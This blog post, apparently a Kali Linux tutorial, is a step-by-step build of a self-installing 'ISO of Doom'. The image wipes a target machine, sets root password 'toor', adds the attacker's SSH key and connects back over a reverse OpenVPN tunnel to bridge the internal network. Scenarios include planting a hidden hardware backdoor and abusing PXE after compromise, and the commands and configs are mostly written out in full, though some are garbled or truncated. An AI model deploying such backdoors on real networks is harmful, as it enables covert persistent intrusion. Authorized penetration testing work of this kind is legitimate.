ISO of DOOM Kali Linux

Some else can also be using this image.

In our last blog post, we provided an example of running an unattended network installation of Kali Linux. Our scenario covered the installation of a custom Kali configuration which contained select tools required for a remote vulnerability assessment using OpenVAS and the Metasploit Framework.

With just a few minor changes to this concept, we can further leverage Kali to create other cool and shiny toys as well. In today’s post, we’ll see what it takes to create what we fondly refer to as “The Kali Linux ISO of Doom”.
The idea we had was to build an “unattended self-deploying” instance of Kali Linux that would install itself on a target machine along with a customized configuration requiring no user input whatsoever. On reboot after the installation completes, Kali would automagically connect back to the attacker using a reverse OpenVPN connection. The VPN setup would then allow the attacker to bridge the remote and local networks as well as have access to a full suite of penetration testing tools on the target network.
Connect Back Penetration Testing Rig
In the first scenario, you need to perform an internal penetration test in a remote location. Rather than go on-site, you prefer having a penetration testing rig set up in the remote network from which you will be able to conduct the assessment. Traditionally, you would need to send a pre-configured computer to the remote site and wriggle your way into that remote rig in order to complete your work. Thankfully, those days are over. Now you can simply send a self-installing ISO to the remote site, ask them to burn it to CD/USB and boot a remote machine with that media. As the installation is completely unattended, the remote operator will not need to interact with the installation at all. “Set it and forget it”.

Post Exploitation Fun

The second scenario is rather cool. Consider the following: During a penetration test, you’ve compromised the internal infrastructure of the target organization. By either abusing PXE booting features in the remote network or a “remote iso upload” to a KVM, you automate an unattended installation of Kali including the OpenVPN connect back feature. Once the installation is complete, you’re bridged to the remote network, on their hardware, and able to escalate the external assessment to an internal one, complete with your full suite of tools.

Remote Hardware Backdoor

The third scenario consists of a remote hardware backdoor used in a physical penetration test engagement. The “backdoor” would once again be a fully fledged Kali Linux installation running our reverse bridging VPN connection. The hardware could be a small netbook, an android phone, or a small USB powered ARM device. This device is left at the customer site tucked away in a place it won’t be noticed, allowing you to bypass external defenses.

Kali Linux Rocks

The awesome thing about this project is that once we figured out all of the components we needed to make this image happen, it was easy to “port” the idea to PXE unattended installs (network installs), “live-build” (ISO’s and images), and Kali bootstrap sequences in general (Cellphone images / ARM hardware). This one idea could be implemented in many ways thanks to Kali’s versatility.
But, enough back patting, lets move on to the awesomeness.

Setting up the OpenVPN Server

We will first set up our OpenVPN server on a Kali Linux box with an external IP address (a.b.c.d). Once that’s done, we’ll build The Kali Linux ISO of Doom on the same machine and make it available for download thorough HTTP. The setup for the OpenVPN server was taken from the WSEC blog. Let’s begin:
# Turn the server into the client’s gateway
[email protected]:~# echo “1” > /proc/sys/net/ipv4/ip_forward
[email protected]:~# iptables -t nat -A POSTROUTING -s -o eth0 -j MASQUERADE
# Generate the OpenVPN server and client certs.
[email protected]:~# cp -rf /usr/share/doc/openvpn/examples/easy-rsa/2.0 .
[email protected]:~/2.0# sed -i ‘s/ –interact//’ build-ca
[email protected]:~/2.0# sed -i ‘s/ –interact//’ build-key-server
[email protected]:~/2.0# . ./vars
[email protected]:~/2.0# ./clean-all
[email protected]:~/2.0# ./build-ca
[email protected]:~/2.0# ./build-key-server server
[email protected]:~/2.0# ./build-key client # we added a single client connection for this server.
[email protected]:~/2.0# ./build-dh
[email protected]:~/2.0# cp -rf keys/{server.crt,server.key,dh1024.pem,ca.crt} /etc/openvpn/
# Generate the OpenVPN server configuration file.
[email protected]:~/2.0# cd /etc/openvpn
[email protected]:/etc/openvpn# cat << EOF > server.conf
port 443
proto tcp
dev tap
ca ca.crt
cert server.crt
key server.key # This file should be kept secret
dh dh1024.pem
push “redirect-gateway def1 bypass-dhcp”
client-config-dir static
keepalive 10 120
user nobody
group nogroup
status openvpn-status.log
verb 3

# Now we create the client keys. We can have more than one.

[email protected]:/etc/openvpn# mkdir -p static

[email protected]:/etc/openvpn# cat << EOF > static/client



[email protected]:/etc/openvpn# cd ~

# start the OpenVPN server

[email protected]:~# /etc/init.d/openvpn start

# Generate SSH keys to later access the client.

[email protected]:~# ssh-keygen

Building the Kali Reverse VPN Agent ISO

Now comes the ISO generation. This is where we will build a custom Kali Linux ISO image with the specific set of tools we need for the engagement. The amazing part about this is how simple it is to accomplish compared to any other penetration testing distribution.
[email protected]:~# apt-get install git live-build cdebootstrap
[email protected]:~# git clone git:// build
[email protected]:~# cd build
# Add OpenVPN and OpenSSH client keys to the live build instance.
[email protected]:~/build# mkdir -p config/includes.chroot/etc/openvpn
[email protected]:~/build# cp /root/2.0/keys/{ca.crt,client.crt,client.key} config/includes.chroot/etc/openvpn/
[email protected]:~/build# mkdir -p config/includes.chroot/root/.ssh/
[email protected]:~/build# cp /root/.ssh/ config/includes.chroot/root/.ssh/authorized_keys
# Create the OpenVPN client configuration file
[email protected]:~/build# cat << EOF > config/includes.chroot/etc/openvpn/client.conf
dev tap
proto tcp
remote a.b.c.d 443 # remote server IP
resolv-retry infinite
ca ca.crt
cert client.crt
key client.key
ns-cert-type server
verb 3
Next we add some chroot hooks to start the openvpn server at boot time:
[email protected]:~/build# cat << EOF >  config/hooks/openvpn.chroot
update-rc.d openvpn enable
update-rc.d ssh enable
We will also want to over-ride the default isolinux.cfg and install.cfg file to have Kali Linux boot automatically into an installation:
[email protected]:~/build# cat << EOF >  config/includes.binary/isolinux/install.cfg
label install
menu label ^Install
linux /install/vmlinuz
initrd /install/initrd.gz
append vga=788 — quiet file=/cdrom/install/preseed.cfg locale=en_US keymap=us hostname=kali domain=local.lan

[email protected]:~/build# cat << EOF > config/includes.binary/isolinux/isolinux.cfg

include menu.cfg

ui vesamenu.c32

default install

prompt 0

timeout 5


lastly, we copy over the same preseed.cfg configuration file we used in the PXE unattended installation post, and place it in the config/debian-installer live build directory:
[email protected]:~/build# mkdir config/debian-installer
[email protected]:~/build# cat << EOF >  config/debian-installer/preseed.cfg
d-i debian-installer/locale string en_US
d-i console-keymaps-at/keymap select us
d-i mirror/country string enter information manually
d-i mirror/suite string kali
d-i mirror/codename string kali
d-i mirror/http/hostname string
d-i mirror/http/directory string /kali
d-i mirror/http/proxy string
d-i clock-setup/utc boolean true
d-i time/zone string US/Eastern
# Disable volatile and security
d-i apt-setup/services-select multiselect

# Enable contrib and non-free

d-i apt-setup/non-free boolean true

d-i apt-setup/contrib boolean true

# Partitioning

d-i partman-auto/method string regular

d-i partman-lvm/device_remove_lvm boolean true

d-i partman-md/device_remove_md boolean true

d-i partman-lvm/confirm boolean true

d-i partman-auto/choose_recipe select atomic

d-i partman/confirm_write_new_label boolean true

d-i partman/choose_partition select finish

d-i partman/confirm boolean true

d-i partman/confirm_nooverwrite boolean true

# Add our own security mirror

d-i apt-setup/local0/repository string kali/updates main

d-i apt-setup/local0/comment string Security updates

d-i apt-setup/local0/source boolean false

d-i apt-setup/use_mirror boolean true

tasksel tasksel/first multiselect standard

d-i pkgsel/upgrade select full-upgrade

# Install a limited subset of tools from the Kali Linux repositories

d-i pkgsel/include string openssh-server openvas metasploit-framework metasploit nano openvpn ntpupdate

# Change default hostname

d-i netcfg/get_hostname string unassigned-hostname

d-i netcfg/get_domain string unassigned-domain

d-i netcfg/hostname string kali # Do not create a normal user account

d-i passwd/make-user boolean false

d-i passwd/root-password password toor

d-i passwd/root-password-again password toor

popularity-contest popularity-contest/participate boolean false

d-i grub-installer/only_debian boolean true

d-i grub-installer/with_other_os boolean false

d-i finish-install/reboot_in_progress note

kismet kismet/install-setuid boolean false

kismet kismet/install-users string

sslh sslh/inetd_or_standalone select standalone

mysql-server-5.5 mysql-server/root_password_again password

mysql-server-5.5 mysql-server/root_password password

mysql-server-5.5 mysql-server/error_setting_password error

mysql-server-5.5 mysql-server-5.5/postrm_remove_databases boolean false

mysql-server-5.5 mysql-server-5.5/start_on_boot boolean true

mysql-server-5.5 mysql-server-5.5/nis_warning note

mysql-server-5.5 mysql-server-5.5/really_downgrade boolean false

mysql-server-5.5 mysql-server/password_mismatch error

mysql-server-5.5 mysql-server/no_upgrade_when_using_ndb error


Once everything is ready to go, we build our ISO image of doom:
[email protected]:~/build# lb config
[email protected]:~/build# lb build # The ISO gets built
[email protected]:~/build# mv binary.hybrid.iso /var/www/
[email protected]:~/build# service apache start
The Kali Linux ISO of Doom is now ready to be downloaded and installed on the internal target machine. The installation and VPN bridge will occur automatically without any user intervention.

Bridging the Network Gaps

Once the VPN connection is established by the client, we can SSH to our internal Kali Linux agent and complete the final requirement: to bridge the remote and local networks together.

On the server

We enable routing to the remote network on the OpenVPN server:
[email protected]:~# route add -net gw

On the Kali Agent

We proceed and turn on IP forwarding along with IP masquerade on the remote Kali agent:
[email protected]:~# echo 1 > /proc/sys/net/ipv4/ip_forward
[email protected]:~# iptables -t nat -A POSTROUTING -s -o eth0 -j MASQUERADE
With this complete, our remote target network is now fully accessible to to us. We can any any tools we have to interact with the remote network just as if it was connected as a WAN. All fully automated, and easy to setup. These sorts of customizations to Kali are where the real power lives.

Leave a Reply

Your email address will not be published. Required fields are marked *